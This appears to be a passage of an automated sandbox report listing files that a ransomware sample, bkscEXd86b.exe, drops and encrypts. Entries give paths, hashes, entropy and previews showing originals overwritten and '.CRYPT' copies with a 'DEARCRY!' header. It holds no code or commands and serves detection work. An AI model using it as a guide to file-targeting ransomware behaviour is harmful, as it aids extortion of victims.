                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-18\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.432048485366865
                                                            Encrypted:false
                                                            SSDEEP:12:rO14Ubt8XLsCeCCUN11McJXQrMiIhXhrvdQ:c4Ut8UMLBieXFq
                                                            MD5:68378A9DB0749885D1D364A350426C9B
                                                            SHA1:775173E7871777CB69BE712B5B56C01E586FE5A7
                                                            SHA-256:305BB7C130FE00E65A17B19B4A93D70E2D0F21A3BE724CFFB24EA0CA198899AC
                                                            SHA-512:9B857AA5C1413A5B99A0EEA91A1D502E8BC914C69059ADC1409D139FCF265B2747EA5E43EE0102FFE68327216CDEB9A1236B90B1AD27D1A5AC81B4B46220BF1C
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: DEARCRY!.....=R.^..e.=....h.*.A....a......C.......c...kD.......ge.TF..H...e..L.....[,.!L.z.....(..W.].{.......e..e[..l.],.r.....$.....-<.\.y.X..r....Tu..F...!&....9Y1...f..._..Q.....^.M....)...{.".@....V...7..x...5.]2.@D...BC..........l~bU./.{Y.tx.$...............3..[_....V=......\i)..m....W...:......`.q&...!&.....OZ.J...>..+....[..IE..j.K3h......<.`....kB...D....QP..B W.F....I. ...eK.]1...k.$..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.466732762362317
                                                            Encrypted:false
                                                            SSDEEP:12:rO+5EfEuIfQ1bkLrUr5ZLe89by8vzWL0sgLYV/oM44:tE8RfQGsT1omW7Jr
                                                            MD5:DC616808CE4073F79F3A97BDF54F20CB
                                                            SHA1:9D42C250631669E1D32AE1FB4B03461CE2B1183E
                                                            SHA-256:E401F3F953FC3E002B52E2127F86FA86884D65F1AE4D2433393374CEAD6E169A
                                                            SHA-512:3EC1DEDF73FD2A811DBC8F6EE1D6D6BB916049EFB412A3A3DF3E5DCED0F9102FBD5404671DB68930158827841FB7CDD01EB80EF081980E960BA80E07AAF83FF6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.......l8..t.u.1.l.'......K.0..?........G.=^.A..}n.t..a..,#./..../...P0..}.]...).l.T..(kx..).....;....q..i...L..S..Ww.!L.(oIJ....H..S7.&......s...~...l....a.G..RQ...U.Z...)q9..:..D.w-j...d[..9.z].....`.f...tI....z.~.U@..Q...&.......[..E.....{...i............../......:Sp}_.;7...%f.-.f..E....f......K>7..sP....o6^9..HW.y..0k...;J.|..BQ......Z..N......h.%..=..B.zm.#W..Yz.dEb;..t....~..2.WG.+.g..@v
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):94
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkO:Yc
                                                            MD5:233909403BEE2841400C073FA0C2F0D1
                                                            SHA1:6675AB9C5CA21F903E070EA1A217AC655584CF55
                                                            SHA-256:F6AFCAF794FE0E04D6EC18BBDE55412A60C0C5EF55E75223B817E97F208BBCCC
                                                            SHA-512:FE8FF0E739B8CCEF7CFAABE107FB95D0B4E006D256A090BEA5FA27F056D6DD72FB2DAE61F5E927EF08810742E02D3301084194EC12F8A757D83F73E32E53B2A1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.297652068604962
                                                            Encrypted:false
                                                            SSDEEP:6:rOksnvWVIO+7kVD+Rq8FRL/lejiNOizcoG6vw+Xp662QncxmJOyUE5w:rOnvkIOskpuVFhdnNOvoG6vw+ZXLnck8
                                                            MD5:58CA4034DAF263DC1F7D5F3276334DBE
                                                            SHA1:DE260EE11D085C47A96DD28CAFC095240CA98F13
                                                            SHA-256:7B04EA3B1F3105C3D014CED681171E8A3625BD9255D04AB57947F8817C684064
                                                            SHA-512:0253B3F532D2DA3A6F6F128241DA0FF804AE2D2266C2734124CFB7D77A7B50E5558D87D3662C44EFB8FA779F92A1E653AE40E142FB2D6C7B06118966644F7E0D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.....}Bd..%>.2.])...\o\..7...VQ.d;....$.>)...(.T.8{_...8._.....zf....~..'p.j.-?.gA.[4B.2b/. Mm*9\76i>tf.o..&..1.yqjy>..Q......J...neq\..b._....4.R.3.......R{U.w.|.i....H.k*....\..rY.=e.rg6.4..._!&..;.M......T.......Y....+g.7.........zi.If..{.........^.......L.#._.yn.JTb......XP....2d....3..\...i.&re.3..T......6+..S...=DB.A....^@@n..S=:.pE.:1..U
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$R2EW2MR.pdf.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.222037750990405
                                                            Encrypted:false
                                                            SSDEEP:6:rOkLo9d7KeZniGzC0zLSTLI5k0edxyhKDMepgUeUjMVeGQT18E8lJU:rOyon7FZC0zGV0SxyyM8HIk18LzU
                                                            MD5:695B49716389817BFE00443CF51FE6D7
                                                            SHA1:952892839B5B421B74DF34FD2FA5062683516A57
                                                            SHA-256:8191B1E8AFDC9A967A35F5D1D42C8D7836CABA1A95B821965004424CDC1EE900
                                                            SHA-512:BB97A818BBCB73AF841A05A57CDF52299E354DA643EB99A43D424F75BEE139B5D56906DCC8C0DE00F31CE7BC6433B853A03321E54C309F6498741A05D9FCBB21
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.....]h.S..D.TL.v..U...a.A.<q..M.g8...i..n'..+..#....^.........b...O.#211..m..r.SL9\W...H......Ef.v.@...-.D..H.....U..7.qY..M...cg...QVQ.J.2..)}C.n..p..&...a=.....C.].m;..*..I.1P..?.V.......<.j..\...^.fv..=6X.@.c..I..^?...].$....0.;.&.k%\...0....n..................He4.A.v....
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.4314474396392
                                                            Encrypted:false
                                                            SSDEEP:6:rOk2z0y/UlebndoERnPbV69GTOYvOMDMCNMsvvKZLOByRxhxKv6P15gEzOn:rOFJ/UlebnBVjVQGyYvxFbKZLs817O
                                                            MD5:D83BC4AD88DBCD35F0AAD8201813A2DC
                                                            SHA1:71370231BD4578BDA07EDD67AA2F7A4947542C59
                                                            SHA-256:624B12FC9E035D56BC3BE83867E1AA10C8DF29A57E554B6A71C35B81F9248CC5
                                                            SHA-512:0FECA91A269AB414E2982AFDCF1BC8CECEF631E85FDA4795DDE7AF440EC18BAE156B8191D98017A07207FEEB1756AA471960CB0126D4BC5B8740F3F20C569FAC
                                                            Malicious:false
                                                            Preview: DEARCRY!....A....l....5.]Y...C..m#. .J.=....-...G<I.&......o&..2X..O..L....L..x..|-...a........]?.tF~.a.&M.../.W..l .B....R{......f...l..j.8........Kz.........o....>....y5.m.v..*....)..BV&...7..k..y.)..d.... U.8S....e.e..2gx.........~......39...?.......i...............dm3....R4r......W.$O..5.vJ....8..~...cC..'?.M.,."5.6.....BZ.:H....\1?.]....o."./.C.........R.3..~P.5}.*2.._....h....*r.K. ..f..S)..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):5.323600488446077
                                                            Encrypted:false
                                                            SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                                            MD5:A526B9E7C716B3489D8CC062FBCE4005
                                                            SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                                            SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                                            SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                                            Malicious:false
                                                            Preview: [.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.454742361675963
                                                            Encrypted:false
                                                            SSDEEP:12:rObeSEld6kUGPqYIc4ZZ/Q6p+EXONzXAnM6FrU1:wLGP2Ff+iONbAM6FA1
                                                            MD5:141A452C55C313F62FA2C7B378C9D968
                                                            SHA1:0DBAE740A932E69787F6B5623B84CD5C263CD798
                                                            SHA-256:0918936D13C2C63CBC7CF061A09B9D28446D2A328B4F12AC35AE3ADBCAE69ABB
                                                            SHA-512:CA74F0A837B06A9AEECB3F6F8ABE6D1FCF5022800C1D0227A6FB401DBAD9DB55CB2EBABF7CC3CBD704F2703541E282179150F4DF4D001431BA948A4EB6FB5AC9
                                                            Malicious:false
                                                            Preview: DEARCRY!.....s...v.5$.w...........b.(...A..xP.3.c....|~N!........L%.......Cv..<..%?.s....c>..@O.Z...#..k<j.>...<._..j.....%:.&..h1`u.A.,.!.|C.a..22..'[!h1.=.R.WH....:.....@.y\.a..b.~.G......\D.......{...4-.B......O[.@:.._k...7.<{...#..>....H.W..*.p.Q.1zN.............-..j.7..lJ..s.....]$.X...T.W+.....M..`.[.=..5....).?9.Ok.......>....P.......y[j\t.F^Gu.N..G......l.%........gv..1......:z..N.......<.
                                                            C:\ProgramData\Adobe\ARM\ArmReport.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):866
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkki:YQ
                                                            MD5:683DD543B58FFED4F679C40960873D60
                                                            SHA1:3AE4229602CF030848ADC22820AFCA614CF55D57
                                                            SHA-256:D0941600D56684A2BAC0D8C5B0034FFF23C0BED9F53C27B46D90CA462B07307E
                                                            SHA-512:749ABB1F0685FEE6402555795AA64F98E040F7FD0D034EFA4BD685C0BAC9B26C98AD3C8EB333C3A1FF71A97F476DDAAD26C40EF71062C3A942AA1A3C9E105121
                                                            Malicious:false
                                                            C:\ProgramData\Adobe\ARM\ArmReport.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1160
                                                            Entropy (8bit):7.830557421959485
                                                            Encrypted:false
                                                            SSDEEP:24:l92nfiTi7ZvjIItPL9PzBeSc4epLrWFqDGwqjd1SKzZNoTEJF0bE:diBxpr8Sxet6FAGTjdFnJEE
                                                            MD5:F5475C46E6156B8FADE98BDDD7FCB47C
                                                            SHA1:C5E584493B8D0B58C71EA46C09CE4BBE8B5E83B2
                                                            SHA-256:D1C804BDEE600BA17273D8BBD8899AA9F8443A131FE1E7EF02E04536C8EAD7C3
                                                            SHA-512:3C189B62475E213F79BBB8819F9C5E68C57DA3588D8B287B2CACD682C68CBAF98D383550F148F70288D1E6B91DDF21A2C10E96C79857481B08F137BEEACC2BCF
                                                            Malicious:false
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):608
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkQ:YO
                                                            MD5:8603AAE2A9433EC411EA7D3461EC572B
                                                            SHA1:B83FAA503BB5B2A46D3CD9A4D21F9137BEB42B91
                                                            SHA-256:884BC61731251D341B969EFF97C65413CD93D3DAD84C835EBFD711D8C9CA3A54
                                                            SHA-512:F36302B338C9C07F9A9F1DEED98F068EB86D6C94B56FB0D575687384352CC1C3CE9BDA8750A11B68A0A0AF9AFF9D2FE6BC652C9753E2B2B49A33477B346771D7
                                                            Malicious:false
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):904
                                                            Entropy (8bit):7.793321592777127
                                                            Encrypted:false
                                                            SSDEEP:24:flzDSNNC7qn9WEaVqK0gz14H51F96NXr2ShiZ:flz1y9VaVqK/ufoX6SoZ
                                                            MD5:F9C634A7A2CD90540504B1536C0DE6DF
                                                            SHA1:41007440D5AE727D6F1F62F1B529634F88520272
                                                            SHA-256:AC6FB5311ECD8108933FB2C10B871DA6663E198BB0D3F3145AE22E372636E6D4
                                                            SHA-512:12BB9EA6E8A70F9687E5B0B5551C07CEE98783021BAAE5C62E119FBB446CD915106ED1D87FC6BF8588AEB2DAFBB123BC3D33E42BBBFD014A54D906087A187169
                                                            Malicious:false
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):214
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkm:Y0
                                                            MD5:D4019C6CB58AE0DFDEC1AA92FDE90415
                                                            SHA1:36315FB6D2E06DC73CC15C191A30E76AC09B3D6C
                                                            SHA-256:6BF207754DB6B212A391E63428AB267D4648446443B2EB1583C9F09AEAACF096
                                                            SHA-512:2B4BE5852CAEEFF9804CF8DACC60B95B80B4211081A4F8C5D6DD805C65476427B2DEC48F61521F1FCDAB90085EC0DB759BFDF1F91BD37F30F0FF11EDD1484ABB
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):7.479305454039198
                                                            Encrypted:false
                                                            SSDEEP:12:rOLXn9jN3hGyugyk/KCPDUoe8Z+uJzZT/6fxWXCm3UTMphQT8a/g:QXn9jN3hGyLyWKG48Z+uBZGfMSm3U4pp
                                                            MD5:E56A02BFCC0FD70A03755576525AFE01
                                                            SHA1:C668B79FDAA6C247EFC6472CF6E17252CDF8566B
                                                            SHA-256:1C5723D266E09395EB0E07640A74953104014FB09780C843FD683AF8A4754C74
                                                            SHA-512:2B3DD4B702C7E9A0A5DE252A351D683D6A50AEBC7BDCED2683BB72D09492F21AF9033488BEEA5CF9E0489C6FED8F3733D38961FC9668D76332FA21796886C4BF
                                                            Malicious:false
                                                            Preview: DEARCRY!......}h.T....(..3C\..k.c.n. Sm..jL......./..ri...+...u.JYA.C...n...b.....[..._..y....N..<C....s..u.X.f.....w..Y..1.....giX).,....&......3........o.q.Ek_...........v1...cE|...^.MY..#...y..!9.K...=c)..[..y.xf.....-.}.S...P-et..PHt....uO.U.).Z..dZ..............t........?.P..T..p..x..N.2#..,......d(.y...x...ME...mO*.]..S....r.H#.....9*.Q.r.d.....-..5P...l....D.7..L.U.LF....i....j..~u0....O...~k7...Q..fv....1......X..b..`...0...2...!.(.o.O.,W=..'.U.<...j.........
                                                            C:\ProgramData\Microsoft OneDrive\setup\refcount.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkn:YT
                                                            MD5:1995DA96CD16A48CEBCBC08424F6F945
                                                            SHA1:A92B995E293D295C4BBAB7043CCCB030BEF47488
                                                            SHA-256:6724431FC312BA42C98B38B8595A49749419526AA89722C77A85C6C813DFDB5A
                                                            SHA-512:04704D934BBD42582FE7D6FB96E1ED8CF36ABD1A43466B39A00A6D87DE7681501081D4EF69FF4C9FA1CDF0CF36BD32AF6FF24994ED059A6F1D7E722C3A4F90B0
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft OneDrive\setup\refcount.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):312
                                                            Entropy (8bit):7.194706544795244
                                                            Encrypted:false
                                                            SSDEEP:6:rOkMdjZ6QFrm35znW2zYcwc9PKdpKDpysEXYXB1dfoq6aRAs0XfQDXAKJeb:rOBjc5znWRc9PKd4pysEXYRTgXaRAnXf
                                                            MD5:EF31C94AFB8663E863415A9689D59B20
                                                            SHA1:A68E557CA2FA2A18DA57F704D1E4A8D6FFFFC01F
                                                            SHA-256:F20A1E28959808FDEE1E82D6D72B2797885A9C1DDCD93498ABBAF8B0C1E4EF62
                                                            SHA-512:419D6E73DD10A2B6F586D789876789BAC18664B33FD2A465412D88F16BCBCF5BA248F499C21CE4C4743367D47D77B6FB1851DB21DB759D3C178FB07814783FDD
                                                            Malicious:false
                                                            Preview: DEARCRY!....../.a./.....U..kP.~..65T....:Ux...j@.3af.FR......O.WB.Y............w...&...V...}..>........x.T..L@^../.o..]..#..0.X..6..\9\5x....X2........Q..jqJ<].p..K{=.g.O..oA...B...h^....+]...:Z.Y...haE.`!g...k...s.Z....6...U....o..TEs.{...z....h.l..../..G$............&fbc..2...reo.{l........Y...~
                                                            C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\analyticsevents.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):876
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkks:YK
                                                            MD5:143116A4EC10866DF93B12F65DB3C393
                                                            SHA1:7757C51AF3E48024C7D5FA03830D45D7304599C5
                                                            SHA-256:6915A95BAB526955821B4206744186AF1BFA7329064049D08FDF47FE31012DD6
                                                            SHA-512:216B73D32360D21A8BE57690A29C0E1E24B2D3837AF81FEAFAC215F71AC28B327F615129BEAB19466A668CE6E67F66338D1CFFD5D16C7926E68459F39FE71DA6
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\analyticsevents.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1160
                                                            Entropy (8bit):7.842446149334136
                                                            Encrypted:false
                                                            SSDEEP:24:WqZcIKOLrGdw7LitlxwnSzogtsU/wYeFLUFGdIt9qo8YCzM2ZpR:5dKOLrGdw7m/xwg+IwYRGdI4jB
                                                            MD5:146D2530D6DA11138EEEBC43F8BAB301
                                                            SHA1:F3B0DB11E5F60B158802B76811F030138EC7E345
                                                            SHA-256:705D2AEB7439B6AFBAC7F57709CCE2E640D278445A5695257CFA988EF9D53733
                                                            SHA-512:49061EF8662CAF406B8DBF42CC915504FE0098D4ADF80346A3C1FC93D21E5E930C5ED5ED5E59D6A0CDFFA726CF2C1159D4DC4B0CFF536C607F17988149861DB7
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):9175040
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:3FB1504A33A72412644E806E1D69F80D
                                                            SHA1:74763DF4FB95028FE4FD3BBFC8783BFD4057E3F5
                                                            SHA-256:7B233FE889D635760205ED98291B50481667E0FD5505C21397AF60BB1D9EC082
                                                            SHA-512:A71F70819F5B7314A8CD14EDAFA33826E9598023FD26955C5935A633ABF27FF21FA85D4EE2648F78DFD15B2FEFCDD8833EE8F8E14B6309C47CEED83B70072D2C
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):9177112
                                                            Entropy (8bit):7.9999804885789185
                                                            Encrypted:true
                                                            SSDEEP:196608:g8clAvoQ784t/nDONMPUonuOvv7MRuSs30Cz6wHpHlL0j5ZirULB9Sl6z5aL2sI:gVAzNQUgRuOwHpHl4jfirULU6z5aTI
                                                            MD5:94AEC24C3032C94E8D7CFD7464F1153F
                                                            SHA1:F68EC2B059DEFFB02C80E900CDD2B9830B395859
                                                            SHA-256:AEE816035C4AA4A39EC45B9178ACA7C42DEE871AAE103EBF94A14B9D426947D7
                                                            SHA-512:91855A319A1EA989D4805D6D8D5B98581B8C068C5EA22321349E8A6B2C653B4400EB770700CE8D0F2F88618D8D1B2298277F066CAA5371023BC53CCB0A0AC347
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:ED70F35C3696BB5CC695413D92911D36
                                                            SHA1:D788F956C66DC3C2DFCCBCD6344096B5DD3E6B1D
                                                            SHA-256:8CAF8BA097A2A2B4D9091C9AB1F2BC928A5D4045ABA1C10755B21CE1A158ABB9
                                                            SHA-512:C5802AB4C443CD24159383397CFB8D0DBC903A6374A885EEFAEBC01973A57C681AA6DE722348CDD31DF0AEFAA57622DC24118276F44F07030614E8D2021FB10D
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1311016
                                                            Entropy (8bit):7.999833684473793
                                                            Encrypted:true
                                                            SSDEEP:24576:ZysuY+tHU8b8H76pyC5as6e4TNVPlGUpw1OSNrdJw+BJbxlB3Verdq:ZqjtHB8H76xI+4TNVNUBxLlupq
                                                            MD5:7E5E443696B9F9D7409FE289D16344EB
                                                            SHA1:3B9DF18D94D9BE72AF12766B781AE0394695D1D3
                                                            SHA-256:1E58BB3218FCBA4F312EDAAD2B95ADDC8415A8E5C3E0266291AF2C096FC0A23E
                                                            SHA-512:B7CA897EBF06CB032C79C0D975E96079916575AB8A8489A59708CD8B109DCAE704FA32FAC75FA375F4D9CC7A55E11BDE1EE7302D5149C865355E7154AF34FFA7
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):5505024
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:13E208EDE447EC1071589C30F6A7C00D
                                                            SHA1:453702FA57AEB7D58165806DB3A8182CEA6A7C52
                                                            SHA-256:9E156EDDDF4F0399AAEE95F979811F95D30146A2CA467705CCA92C1632A453E3
                                                            SHA-512:FF6C48AB118235342ADE4FC53B94AABF37589B195484A7AA0EDC465358C0BC8617A36B0F8F8F99F1CA9B8BCDF4DC7589D4016994ADF3EEAB631435106FFCB571
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5507096
                                                            Entropy (8bit):7.999969755550619
